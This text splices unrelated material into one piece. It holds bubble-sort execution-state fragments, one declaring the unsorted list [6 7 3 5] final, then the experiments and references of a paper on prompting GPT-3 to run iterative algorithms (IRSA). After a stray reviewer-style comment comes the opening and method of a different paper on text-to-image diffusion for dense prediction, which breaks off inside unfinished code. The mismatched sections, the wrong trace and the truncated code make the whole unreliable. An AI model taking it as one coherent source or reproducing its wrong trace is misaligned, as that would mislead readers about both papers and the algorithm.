<state> a=[6 5 8 9 1 2] i=2 P=5 n_swaps=5 swap_flag=false </state> Since i=2 and P=5 i and P are different, so we continue a[i]=a[2]=8 a[i+1]=a[3]=9 Because 8<9 is true we keep state as is and move on by increasing i <state> a=[6 5 8 9 1 2] i=3 P=5 n_swaps=5 swap_flag=false </state>

<state> a=[9 1] i=0 P=1 n_swaps=2 swap_flag=true </state> Since i=0 and P=1 i and P are different, so we continue a[i]=a[0]=9 a[i+1]=a[1]=1 Because 9<1 is false we set swap_flag=true, increase n_swaps by one, and in a=[9 1] swap 9 and 1, and increase i, and keep P as is to get <state> a=[1 9] i=1 P=1 n_swaps=3 swap_flag=true </state>

<state> a=[6 7 3 5] i=3 P=3 n_swaps=7 swap_flag=false </state> Since i=3 and P=3 i and P are equal, so this iteration is done, swap_flag is false, so stop Final List: 6, 7, 3, 5 Number of swaps: 7 END OF EXECUTION

<state> a=[3 5 6 8] i=3 P=3 n_swaps=1 swap_flag=true </state> Since i=3 and P=3 i and P are equal, so this iteration is done, but swap_flag is true, so we need another iteration Iteration: set swap_flag=false. set i=0. The state is: <state> a=[3 5 6 8] i=0 P=3 n_swaps=1 swap_flag=false </state>

<state> a=[2 8 1 3 5 7 4] i=1 P=6 n_swaps=5 swap_flag=false </state> Since i=1 and P=6 i and P are different, so we continue a[i]=a[1]=8 a[i+1]=a[2]=1 Because 8<1 is false we set swap_flag=true, increase n_swaps by one, and in a=[2 8 1 3 5 7 4] swap 8 and 1 and increase i, and keep P as is to get <state> a=[2 1 8 3 5 7 4] i=2 P=6 n_swaps=6 swap_flag=true </state>

<state> a=[4 8] i=0 P=1 n_swaps=7 swap_flag=true </state> Since i=0 and P=1 i and P are different, so we continue a[i]=a[0]=4 a[i+1]=a[1]=8 Because 4<8 is true we keep state as is and move on by increasing i <state> a=[4 8] i=1 P=1 n_swaps=7 swap_flag=true </state>

Problem: 3, 1, 8, 9, 6 EXECUTION Length of the list: L=5 Number of pairs: P=4 a=[3 1 8 9 6] set n_swaps=0, set i=P=4, set swap_flag=true. <state> a=[3 1 8 9 6] i=4 P=4 n_swaps=0 swap_flag=true </state> Since i=4 and P=4 i and P are equal, so this iteration is done, but swap_flag is true, so we need another iteration Iteration: set swap_flag=false. set i=0. The state is: <state> a=[3 1 8 9 6] i=0 P=4 n_swaps=0 swap_flag=false </state> Since i=

2.4 GPT AS A MACHINE LANGUAGE: PROMPTING TO INTERPRET/COMPILE A PROGRAM.

A general-purpose computer can execute algorithms that convert the text of a program into its machine code. Analogously, we designed IRSA prompts that turn code in some language into an execution path that can then be used in prompting (Section A.1). We used a “GPT compiler” for an invented programming language in Prompt A.2 to generate an IRSA-like execution path for the double-loop DP algorithm for the longest common subsequence problem, providing an LCS IRSA prompt.
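The client-side skip-to-state procedure mentioned in Section 2.3 takes only a few lines of Python. The sketch below is ours, not released code from the paper; `complete(text, stop)` is a placeholder for any text-completion API call that returns the model's continuation of `text`, truncated before the stop sequence.

```python
def run_with_skip_to_state(prompt: str, problem: str, complete,
                           max_steps: int = 200) -> str:
    """Client-side skip-to-state generation (Section 2.3), sketched.

    `complete(text, stop)` is an assumed text-completion call returning the
    continuation of `text` up to (excluding) the stop sequence `stop`.
    """
    context = prompt + problem
    transcript = ""
    for _ in range(max_steps):
        chunk = complete(context, stop="</state>")
        if "END OF EXECUTION" in chunk:     # final answer reached, no new state
            transcript += chunk
            break
        chunk += "</state>"                 # restore the consumed stop sequence
        transcript += chunk
        start = chunk.rfind("<state>")
        if start == -1:                     # model produced no state block
            break
        # Resend only the prompt and the newest <state>...</state> block, so
        # the self-attention cost stays constant regardless of transcript length.
        context = prompt + problem + "\n" + chunk[start:]
    return transcript
```

Because each call only ever sees the prompt plus one state, the total attention cost is bounded by the prompt length, regardless of how many iterations the algorithm needs.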
3 EXPERIMENTS

Our experiments include the following evaluations:

• Basic IRSA: Prompting with highly structured single-execution-path examples (Table 1). As opposed to CoT prompts, which provide multiple steps of reasoning shown for a few examples, IRSA prompts use a single example designed to trigger iterative reasoning that is repeated until the stop condition is reached and the solution is found, and the execution-path example for each task is deliberately chosen to be out-of-distribution (e.g., the Bubble Sort prompt features a worked-out example of sorting a four-number sequence in just three passes, while the dataset consists of five-number sequences requiring 2 to 5 iterations and up to 20 state transitions, with varying complexity across problems). Thus, in terms of the information they provide, these prompts can be seen as somewhere between single-shot and zero-shot prompts.

• Skip-to-state IRSA: Prompting as above, but with additional forced attention skipping. In this approach, the LLM is forced to attend only to the prompt and the last generated state as it iterates through the input to find the solution (illustrated at the end of Prompt 3). We also evaluate fragmented prompts (Table 2), where the prompt does not consist of a single complete execution path for an example, but instead shows several state-to-state transitions for different inputs.

• Interpretation of new code: As discussed in Sections 2.4 and A.1, IRSA-style prompting can take code in a high-level language as input and produce IRSA-style annotated execution paths, which then also include the result of the execution at the end. We compare IRSA with the few-shot prompts in Nye et al. (2021) on interpreting and executing 100 synthetic Python programs (Table 3).

Baselines. To make fair comparisons and avoid unnecessary recomputation, we reused existing baselines from Srivastava et al. (2022) wherever possible, denoted by an asterisk (*): logical deduction, balanced parentheses, and longest common subsequence for long sequences. We created our own datasets and ran baselines for the following tasks: Bubble Sort, longest substring without repeating characters, and longest common subsequence for short sequences. We include the best result from Srivastava et al. (2022) for the GPT family, as our experiments were mainly conducted using GPT-3. Our baselines included zero- or few- (5-)shot prompting, with or without relevant code added to the description of the task in the prompt (e.g., Prompt A.11). Few-shot baselines were run with 5 different random choices of examples to include in the prompt. The 'Guessing' strategy refers to picking the most frequently correct answer for a given task as the guess for each problem in the task, which is different from truly random guessing: few-shot prompting could prime the model to pick the most frequently seen answer even when no understanding of the problem occurs, which makes our 'Guessing' strategy more reflective of the task difficulty.

Models. We briefly experimented with different members of the GPT-3 family, but ran complete experiments with CODE-DAVINCI-002 for two reasons: TEXT-DAVINCI-002 and 003 often produced qualitatively similar results, and experimentation with CODE-DAVINCI-002 was easier due to a better combination of token quota and availability. Having been tuned on code, this model may have slight advantages over models tuned for more natural language tasks.
Nevertheless, as we show in the experiments and discuss in Section A.3, without IRSA, CODE-DAVINCI-002 cannot solve the problems discussed here, even when it can generate the code that could. To induce iterative reasoning in LLMs, attention appears to need to be highly regimented through strong structure, and possibly additional attention control, such as the skip-to-state strategy described in Section 2.3. This also applies to GPT-4 (OpenAI, 2023): in Section A.3.3 in the Appendix, we show that prompting GPT-4 with the straightforward Prompts A.12, A.13, and A.14 does not match the performance of IRSA in GPT-3.

Datasets. We test on a mix of reasoning tasks and challenging programming tasks included in computer science curricula and coding interviews for software engineers:

Table 1: IRSA compared with in-context learning baselines, and with the strategy of always guessing the most frequent answer. (*) denotes the best result for GPT-3 from BIG-bench.

| Task | IRSA | Baseline | Guessing |
|-----------------------|------|----------|----------|
| Bubble sort | | | |
| - Prompt 1 | 0.74 | 0.27 | 0.23 |
| - Prompt A.4 | 1.00 | 0.27 | 0.23 |
| Longest substring | 1.00 | 0.60 | 0.59 |
| Logical deduction | 0.76 | 0.32* | 0.2 |
| Parentheses | 0.96 | 0.56* | 0.5 |

**Bubble sort.** We created a dataset of 100 random non-repeating digit sequences of length 5. The task is to predict the number of swaps needed to sort the sequence.

**Longest substring without repeating characters.** A classical coding-interview question: given a string of letters, find the length of the longest contiguous substring in which no letter appears more than once. We created a dataset of 100 random strings of length 7.

**Logical deduction** (Srivastava et al., 2022). We include this task (Section 2.1) in the experiments to emphasize the broad importance of triggering iteration in LLM responses: enabling LLMs to execute iterative algorithms through effective prompting could help solve numerous reasoning problems. The task involves solving a puzzle about the order of items/objects/persons, such as books on a shelf, birds on a branch, cars, golfers, etc., given several clues. We focus on the subtask involving 5 items, with varying sets of items and types of ordering across the puzzles. While in-context learning with LLMs consistently solves less than 35% of these puzzles, a recent combination of GPT-3 and probabilistic reasoning (Ozturkler et al., 2023) was able to solve 77% of them. We reach similar performance through IRSA, without an additional external reasoning mechanism.

**Valid parentheses** (Srivastava et al., 2022), from the cs-algorithms challenge in BIG-bench. The goal is to evaluate LLMs' ability to perform reasoning equivalent to the classical stack manipulations needed to check whether a sequence of parentheses of different types is balanced. LLMs (including GPT) tend to perform at chance level (50%), except for PaLM with 3 shots, which reaches around 75% accuracy.

**Longest common subsequence (long)** (Srivastava et al., 2022), from the BIG-bench cs-algorithms challenge, involves solving a classical dynamic programming problem. Defining a subsequence as a sequence of symbols one could obtain by skipping arbitrary stretches in the original sequence, the task is to find the length of the longest subsequence common to two given sequences. LLMs do not do much better than chance on this task (~10%).
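For reference, the behaviour that the IRSA prompts must emulate here is the classical quadratic-time dynamic program for LCS; the standard textbook implementation below is shown only to make the task concrete and is not part of any prompt.

```python
def lcs_length(a: str, b: str) -> int:
    """Length of the longest common subsequence of a and b.

    dp[i][j] holds the LCS length of the prefixes a[:i] and b[:j].
    """
    m, n = len(a), len(b)
    dp = [[0] * (n + 1) for _ in range(m + 1)]
    for i in range(1, m + 1):
        for j in range(1, n + 1):
            if a[i - 1] == b[j - 1]:
                dp[i][j] = dp[i - 1][j - 1] + 1   # extend a common symbol
            else:
                dp[i][j] = max(dp[i - 1][j], dp[i][j - 1])  # drop one symbol
    return dp[m][n]

assert lcs_length("ABCBDAB", "BDCABA") == 4  # e.g., "BCBA"
```

The double loop and the $M \times N$ table are exactly the state that the skip-to-state prompts of Section 2.3 must carry between iterations, which is why the token cost grows quickly with sequence length.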
**Longest common subsequence (short).** We created this dataset in the same manner as the one above, but limiting sequence lengths to at most 6. This allows us to evaluate IRSA on more cases while ensuring it does not run out of memory (tokens) during generation.

**Synthetic Python programs.** We generated and evaluated 100 random programs involving arithmetic operations and (possibly nested) while and if statements, as in Bieber et al. (2020) and Nye et al. (2021).

**Basic IRSA results.** A summary is provided in Table 1. For Bubble Sort, we show the results using Prompt 1 (74%) and Prompt A.4 (100%). The latter tracks the full state, including a loop iterator. Note that while the execution path for the prompt example 2, 3, 1, 5 requires 3 iterations of the outer loop and 3 iterations in each inner loop, the dataset, with sequences of length 5, requires four iterations in the inner loop and a variable number of iterations of the outer loop, anywhere from 2 to 5, and yet the model executes the correct number of iterations based on the stopping criterion.

For the logical deduction puzzles, we used Prompt 2, even though the iterative reasoning logic there is faulty, as it may enter an infinite loop. When that happens, the generation runs out of tokens, and we simply used the answer after the 4th iteration in the evaluation. Section A.3 suggests the potential for creating more effective prompts. Nevertheless, this prompt still leads to state-of-the-art results, comparable only with Ozturkler et al. (2023), which uses an external reasoning mechanism. The longest-substring-without-repeating-characters problems are solved with IRSA Prompt A.5, explained in Section A.2. To address the parentheses problem, we used Prompt A.6 in Section A.2.1.

Table 2: IRSA with skip-attention on Bubble Sort and Longest Common Subsequence problems, and fragmented prompting on Bubble Sort problems. (*) denotes the best GPT result in BIG-bench.

| Baselines | Bubble Sort | LCS-S | LCS-L |
|-------------------|-------------|-------|-------|
| 0-shot | 0.20 | 0.09 | 0.14* |
| 0-shot + code | 0.20 | 0.11 | - |
| few shot | 0.25±0.05 | 0.07±0.01 | 0.16* |
| few shot + code | 0.23±0.03 | 0.06±0.02 | - |
| Guessing | 0.23 | 0.44 | 0.10 |

| IRSA skip-to-state | Bubble Sort | LCS-S | LCS-L |
|--------------------|-------------|-------|-------|
| single path | 0.95 | 0.93 | 0.28 |
| 7 fragments | 0.99±0.02 | - | - |
| 13 fragments | 0.97±0.03 | - | - |
| 19 fragments | 0.97±0.03 | - | - |
| 25 fragments | | - | - |

Table 3: Interpretation of 100 synthetic Python programs with arithmetic, if clauses, and nested loops.

| Interpreter Prompts | 1-shot | 2-shot | 3-shot |
|--------------------|--------|--------|--------|
| Execution trace in Nye et al. (2021) | 0.55 | 0.54 | 0.59 |
| IRSA | 0.85 | 0.86 | 0.91 |

Skip-to-state attention results. The longest common subsequence (LCS) problem requires a state that includes an $M \times N$ matrix holding solutions for all prefixes of the two sequences of lengths $M$ and $N$. Without skip-to-state attention (Section 2.3), the API calls can run out of tokens. Using the approach described in Section 2.4, we compiled an execution path into Prompt A.3 and then used it to induce IRSA on LCS-short (LCS-S) and LCS-long (LCS-L) problems. Even with skip attention, the state was too large to fit the token limit for most of the problems in LCS-L from BIG-bench. Yet, IRSA with skip attention still beats the state of the art significantly (Table 2).
On shorter problems in LCS-S, where IRSA with skip-attention does not run out of tokens, the performance was a respectable 93%. Note that GPT-4, without IRSA, achieves only 69% accuracy on LCS-S (Section A.3.3).

We tested fragmented prompting of Bubble Sort execution (Table 2). For each selected number of fragments (7, 13, 19, 25), at least one of five randomly generated prompts achieved 100% accuracy. These prompts followed the format in Prompt 3, starting with a few state transitions from the beginning for the sequence [2, 3, 1, 5] and then listing an additional 6, 12, 18, or 24 fragments. Bubble Sort has 6 different transitions, and fully balanced instructions, listing one, two, three, or four fragments of each type with a random sequence in the state, lead to slightly better performance than completely randomly chosen execution-path fragments. These six basic transitions, illustrated in Prompt 3, involve two ways of ending an iteration, depending on the swap flag, and four ways of changing the state: two possibilities for the inequality being true or not, combined with two possible previous values of the swap flag. We found that prompt sensitivity causes different prompts to fail on different test cases: each of the fragmented prompt collections yields 100% as an ensemble.

Interpretation of random programs. Table 3 compares the scratchpad prompts of Nye et al. (2021) (Prompt A.8), which show execution traces for three programs but without the reasoning logic for state transitions and if- and while-triggered jumps, with the corresponding IRSA-style prompts (Prompt A.9) on the interpretation of 100 Python programs (Section A.1).

4 CONCLUSION

We demonstrated that GPT-3 can be triggered to execute iterative algorithms, including double loops, with variable termination conditions. This has consequences discussed in the Appendix (Section A.3). For example, IRSA may find applications in software engineering and education. If LLMs are programmable (in addition to being natural language translators and analyzers), their evaluation probably needs to be rethought, especially in cases where models are expected to make inferences for which we have algorithms, because in-context learning would cover prompts designed to execute them (Section A.3). Regimenting self-attention for a given task may require a level of effort (Section A.3.2), but even GPT-4 cannot execute programs consistently without IRSA (Section A.3.3).

REFERENCES

Yoshua Bengio. The consciousness prior. *arXiv preprint arXiv:1709.08568*, 2017.

David Bieber, Charles Sutton, Hugo Larochelle, and Daniel Tarlow. Learning to execute programs with instruction pointer attention graph neural networks. In H. Larochelle, M. Ranzato, R. Hadsell, M.F. Balcan, and H. Lin (eds.), *Advances in Neural Information Processing Systems*, volume 33, pp. 8626–8637. Curran Associates, Inc., 2020. URL https://proceedings.neurips.cc/paper_files/paper/2020/file/62326dc7c4f7b849d6f013ba46489d6c-Paper.pdf

Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, Sandhini Agarwal, Ariel Herbert-Voss, Gretchen Krueger, Tom Henighan, Rewon Child, Aditya Ramesh, Daniel Ziegler, Jeffrey Wu, Clemens Winter, Chris Hesse, Mark Chen, Eric Sigler, Mateusz Litwin, Scott Gray, Benjamin Chess, Jack Clark, Christopher Berner, Sam McCandlish, Alec Radford, Ilya Sutskever, and Dario Amodei. Language models are few-shot learners. *Neural Information Processing Systems (NeurIPS)*, 2020.
Sébastien Bubeck, Varun Chandrasekaran, Ronen Eldan, Johannes Gehrke, Eric Horvitz, Ece Kamar, Peter Lee, Yin Tat Lee, Yuanzhi Li, Scott Lundberg, Harsha Nori, Hamid Palangi, Marco Tulio Ribeiro, and Yi Zhang. Sparks of artificial general intelligence: Early experiments with gpt-4, 2023. Mark Chen, Jerry Tworek, Heewoo Jun, Qiming Yuan, Henrique Ponde de Oliveira Pinto, Jared Kaplan, Harri Edwards, Yuri Burda, Nicholas Joseph, Greg Brockman, Alex Ray, Raul Puri, Gretchen Krueger, Michael Petrov, Heidy Khlaaf, Girish Sastry, Pamela Mishkin, Brooke Chan, Scott Gray, Nick Ryder, Mikhail Pavlov, Alethea Power, Lukasz Kaiser, Mohammad Bavarian, Clemens Winter, Philippe Tillet, Felipe Petroski Such, Dave Cummings, Matthias Plappert, Fotios Chantzis, Elizabeth Barnes, Ariel Herbert-Voss, William Hebgen Guss, Alex Nichol, Alex Paino, Nikolas Tezak, Jie Tang, Igor Babuschkin, Suchir Balaji, Shantanu Jain, William Saunders, Christopher Hesse, Andrew N. Carr, Jan Leike, Josh Achiam, Vedant Misra, Evan Morikawa, Alec Radford, Matthew Knight, Miles Brundage, Mira Murati, Katie Mayer, Peter Welinder, Bob McGrew, Dario Amodei, Sam McCandlish, Ilya Sutskever, and Wojciech Zaremba. Evaluating large language models trained on code, 2021. URL https://arxiv.org/abs/2107.03374 Aakanksha Chowdhery, Sharan Narang, Jacob Devlin, Maarten Bosma, Gaurav Mishra, Adam Roberts, Paul Barham, Hyung Won Chung, Charles Sutton, Sebastian Gehrmann, et al. PaLM: Scaling language modeling with pathways. *arXiv preprint arXiv:2204.02311*, 2022. Antonia Creswell, Murray Shanahan, and Irina Higgins. Selection-inference: Exploiting large language models for interpretable logical reasoning. *arXiv preprint arXiv:2205.09712*, 2022. Luyu Gao, Aman Madaan, Shuyan Zhou, Uri Alon, Pengfei Liu, Yiming Yang, Jamie Callan, and Graham Neubig. Pal: Program-aided language models. *arXiv preprint arXiv:2211.10435*, 2022. Anirudh Goyal and Yoshua Bengio. Inductive biases for deep learning of human cognition. *arXiv preprint arXiv:2011.15091*, 2020. Daniel Kahneman. *Thinking, fast and slow*. Macmillan, 2011. Tushar Khot, Harsh Trivedi, Matthew Finlayson, Yao Fu, Kyle Richardson, Peter Clark, and Ashish Sabharwal. Decomposed prompting: A modular approach for solving complex tasks. *arXiv preprint arXiv:2210.02406*, 2022. Takeshi Kojima, Shixiang Shane Gu, Machel Reid, Yutaka Matsuo, and Yusuke Iwasawa. Large language models are zero-shot reasoners. *arXiv preprint arXiv:2205.11916*, 2022. Yifei Li, Zeqi Lin, Shizhuo Zhang, Qiang Fu, Bei Chen, Jian-Guang Lou, and Weizhu Chen. On the advance of making language models better reasoners. *arXiv preprint arXiv:2206.02336*, 2022a. Yujia Li, David Choi, Junyoung Chung, Nate Kushman, Julian Schrittwieser, Rémi Leblond, Tom Eccles, James Keeling, Felix Gimeno, Agustin Dal Lago, et al. Competition-level code generation with alphacode. *Science*, 378(6624):1092–1097, 2022b.
hujS6bmduD
The architecture of the tagging adapter is not well motivated. The TextEnc and ImageEnc in the tagging adapter, as described in Eq. 6, should be explained in more detail, including details of their model architectures. How do TextEnc and ImageEnc relate to the cross-attention modules in Figure 2?
HARNESSING TEXT-TO-IMAGE DIFFUSION FOR DENSE PREDICTION TASKS Anonymous authors Paper under double-blind review ABSTRACT Equipped with large-scale training data, text-to-image diffusion models have demonstrated the capacity to generate high-quality images that semantically correspond to the given textual descriptions. These compelling results imply that visual semantic knowledge has been effectively encapsulated within the generative diffusion model. The prospect of utilizing this embedded knowledge as a prior for downstream vision tasks presents an intriguing avenue for exploration, which remains notably under-investigated. In this work, we demonstrate that when provided with appropriate image tags as textual descriptions, the implicit knowledge within these text-to-image diffusion models can be effectively leveraged for visual dense prediction tasks. Initially, we discover that supplying ground-truth semantic labels as textual instructions significantly enhances performance due to the extracted high-quality visual knowledge. Motivated by this observation, when presented with noisy tagging labels, we propose an adapter module that attempts to derive the relevant semantic information. Subsequently, we propose a multi-label classification learning objective that further enriches the semantic quality of tags, thereby amplifying the efficacy of knowledge extraction. We conduct extensive experiments on four benchmarks, which suggest that the proposed approach effectively unlocks the representational capabilities of text-to-image diffusion models, showcasing a promising avenue for advancing dense prediction tasks in visual domains. 1 INTRODUCTION In the current wave of advancing generative models, the domain of Natural Language Processing (NLP) has experienced notable progress, illustrated by models such as GPT (Radford et al., 2018; 2019; Brown et al., 2020), T5 (Raffel et al., 2020), and PaLM (Chowdhery et al., 2022), which have exhibited outstanding performance across a variety of tasks. In contrast, the realm of computer vision is still searching for its foundation models and has not yet attained a similar level of success. However, leveraging large-scale pre-training datasets, text-to-image generative models (Saharia et al., 2022; Rombach et al., 2022) have recently demonstrated a remarkable capability to generate high-quality images that semantically correspond to the given textual descriptions. This indicates that diffusion models have acquired a visual understanding of images spanning high-level image granularity to low-level pixel granularity. Dense visual prediction tasks, such as semantic segmentation and panoptic segmentation, also require high-level visual understanding of image regions in order to classify pixels accurately. It is therefore intriguing to explore methodologies for extracting the latent knowledge encapsulated within diffusion models for these visual dense prediction tasks, a direction that remains notably under-investigated. Recent studies have revealed that text-to-image diffusion models, when pretrained with textual inputs as conditions, are capable of developing distinct representation features that align with the specified prompts and instructions (Hertz et al., 2022; Parmar et al., 2023). Subsequent research (Baranchuk et al., 2021; Xu et al., 2023; Zhao et al., 2023) has built upon these findings, employing diffusion models as foundation models and adapting them to different visual tasks.
However, a pivotal question remains: how can the embedded knowledge be effectively extracted for visual tasks, particularly visual dense prediction tasks? Following previous studies, we delve into examining the influence of textual inputs on the performance of dense prediction tasks when using text-to-image diffusion models as a foundation model. Intuitively, we hypothesized that the accuracy of the text would directly correlate with the quality of the extracted knowledge and, subsequently, the performance on downstream visual tasks. To test this, we conducted an “oracle” experiment where ground-truth semantic class labels were employed as conditions to adapt a stable diffusion model (Rombach et al., 2022) for downstream tasks. The results, depicted in Figure 1, highlight the pivotal role of the semantic condition in extracting knowledge from text-to-image models, thereby enhancing performance on subsequent downstream tasks. In comparison to an “unconditioned” setting, using accurate semantic class labels resulted in a substantial +20 mIoU improvement on ADE20K. On the other datasets, the text-to-image model also achieved state-of-the-art performance. A significant performance disparity is observed between models operating without conditions and those conditioned on ground-truth semantics. Given the typical unavailability of accurate tags in real-world applications, it becomes intriguing to approximate the ground-truth semantic condition, with the aim of enhancing performance on downstream tasks. Specifically, we delve into and experiment with two strategies for approximating ground-truth semantics: 1) Utilize off-the-shelf zero-shot tagging models to identify or assign image tags. Specifically, we resort to pre-trained image tagging models to predict tags in a zero-shot setting. Even when the tagging space of the pre-trained data does not align with the semantic label space of downstream datasets, textual embeddings generated by pre-trained language models generally encapsulate semantic information (Raffel et al., 2020), which can be directly leveraged. 2) Incorporate a multi-label classification learning objective to further enrich the semantic quality of tags. Essentially, we train the tagging adapter to predict image tags. We employ this strategy in an effort to reduce the noise level of the zero-shot tagging model and thereby approximate the ground-truth semantic condition more closely. Subsequently, these predicted semantic tags are fed into the diffusion model as conditions, which are hypothesized to be closer to the ground-truth semantic condition. The two strategies we propose significantly enhance the performance of diffusion models on dense predictions. Importantly, they can be used together, further boosting performance. Exhaustive experiments across various benchmarks, including semantic segmentation datasets like ADE20K (Zhou et al., 2019), COCO-Stuff164k (Caesar et al., 2018), and Cityscapes (Cordts et al., 2016), as well as the panoptic segmentation standard COCO-Panoptic (Lin et al., 2014), demonstrate that our approach consistently surpasses alternative text-to-image diffusion model transfer methods. 2 RELATED WORK 2.1 TEXT-TO-IMAGE GENERATION Text-to-image generation endeavors to create convincing images inspired by textual descriptions. Reed et al. (2016) laid the groundwork in this area by introducing the Conditional GAN.
Subsequent advancements have achieved superior image quality via techniques including attention mechanisms (Xu et al., 2018), contrastive methods (Zhou et al., 2022; Zhang et al., 2021a), and multi-stage generation architectures (Zhang et al., 2017). One of the noteworthy strides in this field is the integration of diffusion models such as Stable Diffusion (Rombach et al., 2022), which innovatively combine diffusion processes within the generative model framework. These models often utilize denoising autoencoders to approximate the inverse dynamics of a Markovian diffusion process (Sohl-Dickstein et al., 2015; Ho et al., 2020). A key characteristic of Stable Diffusion is its proficiency in generating visual content that aligns closely with textual descriptions, leveraging transformer architectures trained on vast datasets like LAION-5B (Schuhmann et al., 2022). 2.2 GENERATIVE REPRESENTATION LEARNING Generative models have been widely used for crafting discriminative representations, especially within the realm of Generative Adversarial Networks (GANs) (Goodfellow et al., 2020). For instance, Big-BiGAN (Donahue & Simonyan, 2019) showcased impressive results on ImageNet recognition tasks (Deng et al., 2009). Concurrently, models like DatasetGAN (Li et al., 2022a; Zhang et al., 2021c) have illustrated the potential of GANs in enhancing visual perception tasks. The recent trend emphasizes the power of diffusion models for discriminative representation learning. Initiatives like DDPM-Seg (Baranchuk et al., 2021) have combined unconditional diffusion denoising features with decoders to excel in segmentation tasks. Likewise, ODISE (Xu et al., 2023) leveraged a frozen stable diffusion model as a foundation for mask generation, establishing a benchmark in open-vocabulary panoptic segmentation. Remarkably, this model seamlessly incorporates an implicit captioner, converting image features into cross-attention inputs, thereby surpassing methods dependent on unconditional inputs. Meanwhile, VPD (Zhao et al., 2023) proposed initializing a visual perception model from the pre-trained weights and subsequently fine-tuning the denoising U-Net with task-specific decoders. Inspired by these pioneering efforts, we believe that the vast potential of pre-trained text-to-image diffusion models remains untapped, largely due to the limited exploration of the pivotal role of textual semantics. Consequently, our research aims to elucidate the influence of textual semantics with a rigorous yet simple methodology. 3 METHOD 3.1 DIFFUSION MODEL OVERVIEW This section provides a concise review of the latent diffusion model adopted in our study. We utilize the pre-trained latent diffusion model presented in (Rombach et al., 2022), which has been trained via diffusion processes on vast text-image paired datasets. In their standard form, these models integrate a noise sample into a latent variable $z$ to produce $z_t$, formulated as: $$z_t = \sqrt{\bar{\alpha}_t}\, z + \sqrt{1 - \bar{\alpha}_t}\, \epsilon$$ where $\alpha_1, \ldots, \alpha_t$ are noise-schedule hyperparameters and $\bar{\alpha}_t = \prod_{k=1}^{t} \alpha_k$. The training objective can be expressed as: $$L_{LDM} := \mathbb{E}_{z = \mathcal{E}(x),\, c,\, \epsilon \sim \mathcal{N}(0,1),\, t} \left[ \left\| \epsilon - \epsilon_\theta(z_t, t, T(c)) \right\|_2^2 \right]$$ where $\mathcal{E}$ denotes the latent image encoder, $T(c)$ signifies the encoded text prompts, and $\epsilon_\theta$ commonly adopts a U-Net architecture, which is optimized during the training process.
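For concreteness, the forward noising step (Eq. 1) and the training objective (Eq. 2) can be written as a minimal PyTorch sketch. Here `unet` stands in for the denoising network $\epsilon_\theta$ and `text_cond` for the encoded prompt $T(c)$; both are placeholders rather than the actual implementation.

```python
import torch
import torch.nn.functional as F

def make_alpha_bar(alphas: torch.Tensor) -> torch.Tensor:
    # bar_alpha_t = prod_{k<=t} alpha_k: cumulative product of the noise schedule
    return torch.cumprod(alphas, dim=0)

def noise_latent(z: torch.Tensor, t: torch.Tensor, alpha_bar: torch.Tensor):
    # Eq. 1: z_t = sqrt(bar_alpha_t) * z + sqrt(1 - bar_alpha_t) * eps
    eps = torch.randn_like(z)
    ab = alpha_bar[t].view(-1, 1, 1, 1)           # broadcast over (B, C, H, W) latents
    z_t = ab.sqrt() * z + (1.0 - ab).sqrt() * eps
    return z_t, eps

def ldm_loss(unet, z, t, text_cond, alpha_bar):
    # Eq. 2: L_LDM = E[ || eps - eps_theta(z_t, t, T(c)) ||^2 ]
    z_t, eps = noise_latent(z, t, alpha_bar)
    eps_pred = unet(z_t, t, text_cond)            # eps_theta: the denoising U-Net
    return F.mse_loss(eps_pred, eps)
```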
3.2 DIFFUSION FEATURE EXTRACTOR The generative process of diffusion models is essentially the inverse of training, beginning with noise sampled from a Gaussian distribution (Song et al., 2020; Ho et al., 2020; Karras et al., 2022). Although diffusion models are well known for producing high-resolution images via multi-step denoising, they are not specifically designed for dense prediction tasks. For instance, dense prediction commonly starts from a specific image rather than from Gaussian noise. To adapt diffusion models for such tasks, we: 1) Use a VQGAN encoder (Esser et al., 2021) to extract latent image features. 2) Introduce minor noise to these features, which, in combination with textual prompts, feeds into a pre-trained denoising U-Net. 3) Capture the U-Net’s internal features, denoted as $f_i(\epsilon_\theta, z_t, T(c))$. 4) Feed the acquired features into a task-specific decoder $D$ and compute the discrepancy between the predicted outcome and the ground truth $y$: $$L = \text{Loss}\left( D\left( f_i(\epsilon_\theta, z_t, T(c)) \right),\, y \right)$$ During training, one can choose to either freeze the original diffusion model parameters or fine-tune them. Empirical results suggest that the latter usually yields enhanced performance. Figure 2: The overall framework of our method. (a) Given an image, we first formulate image-text pair inputs. The text can be derived in one of two ways: using the full set of class candidates related to the dataset, or employing off-the-shelf image tagging models to predict image tags. These pairs are then fed into the frozen image encoder and text encoder. (b) A set of queries is introduced to the tagging adapter with \( \times N \) attention blocks. This process can be supervised using a multi-label classification loss against the ground-truth labels. Subsequently, these queries are treated as diffusion conditions, guiding the diffusion model to produce features relevant to downstream tasks. 3.3 CONDITION ADAPTER For the diffusion model, conditioning plays a pivotal role in determining the semantic content of internal features. In the generative pre-training phase, \( \epsilon_\theta \) is optimized with respect to the joint distribution of \((z_t, t, T(c))\). Here, \( z_t \) is a noisy rendition of \( z = \text{VQGAN}(x) \). Identifying the ideal textual condition \( T(c) \) for dense prediction tasks remains an area of active research. Potential strategies include: 1) Unconditional input: using an empty text prompt. Though not optimal, it is more favorable than resorting to irrelevant captions. 2) Off-the-shelf image captioning models: such as BLIP (Li et al., 2022b), which often overlook essential object details, leading to mediocre outcomes. 3) Training adapters for downstream tasks: notably, the text adapter (Zhao et al., 2023) and the image-to-implicit-caption adapter (Xu et al., 2023) are prevalent. The text adapter processes dataset-associated category names through a frozen text encoder, refined further by MLP layers: \[ T(c) = \text{TextEnc}(c) + \gamma \text{MLP}(\text{TextEnc}(c)). \] The image-to-implicit-caption adapter, on the other hand, generates implicit captions from frozen image features (a code sketch of these two adapters is given below): \[ T(c) = \text{MLP}(\text{ImageEnc}(I)). \] 3.4 TAGGING ADAPTER While both the text and image adapters present distinct advantages, neither fully harnesses the capabilities of the pre-trained weights. This limitation primarily stems from their inability to supply the diffusion model with sharp, precise information.
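For reference, the two baseline adapters of §3.3 (Eqs. 4 and 5) admit a compact implementation. The hidden sizes, GELU activations, and the initialization of $\gamma$ below are our assumptions, not values specified by the paper.

```python
import torch
import torch.nn as nn

class TextAdapter(nn.Module):
    """Eq. 4: T(c) = TextEnc(c) + gamma * MLP(TextEnc(c)), a residual refinement
    of frozen text embeddings of the dataset's category names."""
    def __init__(self, dim: int, gamma_init: float = 1e-4):
        super().__init__()
        self.mlp = nn.Sequential(nn.Linear(dim, dim), nn.GELU(), nn.Linear(dim, dim))
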